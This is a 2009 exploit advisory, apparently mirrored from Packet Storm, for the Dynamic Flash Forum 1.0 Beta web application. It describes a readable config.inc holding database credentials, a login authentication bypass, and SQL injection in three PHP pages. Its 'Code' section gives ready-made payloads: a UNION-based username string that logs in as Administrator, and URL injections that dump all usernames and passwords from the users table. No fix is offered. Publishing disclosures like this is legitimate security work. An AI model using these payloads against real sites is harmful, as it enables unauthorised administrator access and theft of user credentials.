Lucene search
K

Dynamic Flash Forum 1.0 Beta SQL Injection

🗓️ 11 Apr 2009 00:00:00Reported by Salvatore FrestaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Dynamic Flash Forum 1.0 Beta SQL Injection - Information Disclosure, Authentication Bypass, Multiple SQL Injectio

Code
`******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Dynamic Flash Forum  
[+] Version: 1.0 Beta  
[+] Website: http://df2.sourceforge.net/  
  
[+] Bugs: [A] Information Disclosure  
[B] Authentication Bypass  
[C] Multiple SQL Injection  
  
[+] Exploitation: Remote  
[+] Date: 09 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: [email protected]  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Information Disclosure  
  
[-] File affected: config.inc  
  
This file contains reserved informations such as  
the username and the password for connecting to  
the database. Using .inc extension only, the  
content is visible.  
  
  
- [B] Authentication Bypass  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: login.php  
  
This bug allows a guest to bypass the authentication  
system and to login with administrator privileges.  
  
  
- [C] Multiple SQL Injection  
  
[-] Requisites: magic_quotes_gpc = off  
[-] File affected: viewprofile.php, viewmessage.php,  
viewthreads.php  
  
This bug allows a guest to execute arbitrary  
queries.  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Information Disclosure  
  
http://www.site.com/path/config.inc  
  
  
- [B] Authentication Bypass  
  
Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23  
Password: password  
  
  
- [C] Multiple SQL Injection  
  
http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,  
password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23  
  
http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT  
NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,  
password)),NULL,NULL,NULL FROM users%23  
  
http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT  
NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,  
password)) FROM users%23  
  
  
*************************************************  
  
[+] Fix  
  
No fix.  
  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation